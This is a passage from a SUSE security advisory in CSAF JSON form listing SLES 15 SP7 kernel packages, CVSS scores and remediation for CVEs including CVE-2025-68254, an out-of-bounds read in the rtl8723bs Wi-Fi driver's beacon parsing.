"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68245"
},
{
"cve": "CVE-2025-68254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in OnBeacon ESR IE parsing\n\nThe Extended Supported Rates (ESR) IE handling in OnBeacon accessed\n*(p + 1 + ielen) and *(p + 2 + ielen) without verifying that these\noffsets lie within the received frame buffer. A malformed beacon with\nan ESR IE positioned at the end of the buffer could cause an\nout-of-bounds read, potentially triggering a kernel panic.\n\nAdd a boundary check to ensure that the ESR IE body and the subsequent\nbytes are within the limits of the frame before attempting to access\nthem.\n\nThis prevents OOB reads caused by malformed beacon frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68254",
"url": "https://www.suse.com/security/cve/CVE-2025-68254"
},
{
"category": "external",
"summary": "SUSE Bug 1255140 for CVE-2025-68254",
"url": "https://bugzilla.suse.com/1255140"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
